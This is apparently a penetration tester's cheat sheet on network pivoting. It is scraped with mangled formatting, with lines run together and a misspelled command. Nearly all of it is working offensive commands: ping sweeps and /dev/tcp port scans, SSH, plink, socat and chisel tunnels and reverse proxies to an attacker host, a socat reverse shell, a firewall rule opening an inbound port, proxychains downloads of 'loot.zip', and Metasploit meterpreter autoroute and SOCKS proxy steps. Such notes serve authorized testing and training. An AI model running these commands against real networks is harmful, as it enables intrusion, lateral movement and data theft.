arp -a/etc/hosts or C:\Windows\System32\drivers\etc\hosts/etc/resolv.confipconfig /allnmcli dev showfor i in {1..255}; do (ping -c 1 192.168.0.${1} | grep "bytes from" &); done
for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo $i is open; done
nmapsh
ssh <username>@$ATTACKER_IP -R 9050 -Nsh
proxychains nc <IP> <PORT>
proychains nmap <IP>
proxychains ssh user@$TARGET_IP
proxychains evil-winrm -i $TARGET_IP -u $USER -p $PASS
proxychains wget http://$TARGET_IP:8000/loot.zip/etc/proxychains.conf or ./proxychains.confcontaining:
```sh
[ProxyList]socks4 127.0.0.1 9050
```
LocalPortForwarding
sh
ssh -L $LOCAL_PORT:<IP_seen_from_Jumpserver>:<Port_seen_from_Jumpserver> <user>@<Jumpserver> -fN
ssh <username>@<jumpserver> -L *:$LOCAL_PORT:127.0.0.1:80 -N. One can connect now to the target via the jumpserversh
netsh advfirewall firewall add rule name="new port" dir=in action=allow protocol=TCP localport=%PORT%Dynamic Port Forwarding
sh
ssh -D $PORT <user>@<Jumpserver> -fN
Reverse Proxy, if there is an SSH client on the jumpserver but no SSH server via
sh
ssh -R $LOCAL_PORT:$TARGET_IP:$TARGET_PORT USERNAME@$ATTACKER_IP(local) -i $KEYFILE -fN
-N to not receive an interactive shell. The attacking user does not necessarily have one on the targetcmd.exe /c echo y | .\plink.exe -R <LocalPort>:<TargetIP>:<TargetPort> <user>@<Jumpserver> -i <key> -N
sh
puttygen <keyfile> -o key.ppkecho y | &.\plink.exe -ssh -l <MYUSERNAME> -pw <MYPASSWORD> -R <MYIP>:<MYPORT>:127.0.0.1:<TARGETPORT> <MYIP>
Reverse shell on target via
sh
./socat tcp-l:8000 tcp:<attacker-IP>:443 &
sh
sudo nc -lvnp 443Relay on jumpserver via
sh
./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &
Quiet Port Forwarding
sh
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &sh
./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &localhost:8000Processes are backgrounded via &. Therefore, the process can be quit by using the corresponding bg number like kill %1.
In need of a Download on target, expose a port on the attacker via relay
sh
socat tcp-l:80,fork tcp:$ATTACKER_IP:80
Reverse Proxy
sh
./chisel server -p <ListeningPort> --reverse &sh
./chisel client <attacker-IP>:<attacker-Port> R:socks &proxychains.conf contains
sh
[ProxyList]
socks5 127.0.0.1 <Listening-Port>Forward SOCKS Proxy
sh
./chisel server -p <Listen-Port> --socks5sh
./chisel client <target-IP>:<target-Port> <proxy-Port>:sockssh
./chisel server -p <Listen-Port> --reverse &sh
./chisel client <attacker-IP>:<attackerListen-Port> R:<Forwarder-Port>:<target-IP>:<target-Port> &sh
./chisel server -p <Listen-Port>sh
./chisel client <Listen-IP>:<Listen-Port> <attacker-IP>:<target-IP>:<target-Port>pip install sshuttlesshuttle -r <user>@<target> <subnet/CIDR>sshuttle -r <user>@<target> -N
sshuttle -r <user>@<target> --ssh-cmd "ssh -i <key>" <subnet/CIDR>
-x, for example the target/gateway serverset payload linux/x64/meterpreter_reverse_tcp after successful connection doportfwd add -l 22 -p 22 -r 127.0.0.1
multi/handlerbackground
use post/multi/manage/autoroute
set session 1
set subnet <10.0.0.0>
run
use auxiliary/server/socks_proxy
Social_engineering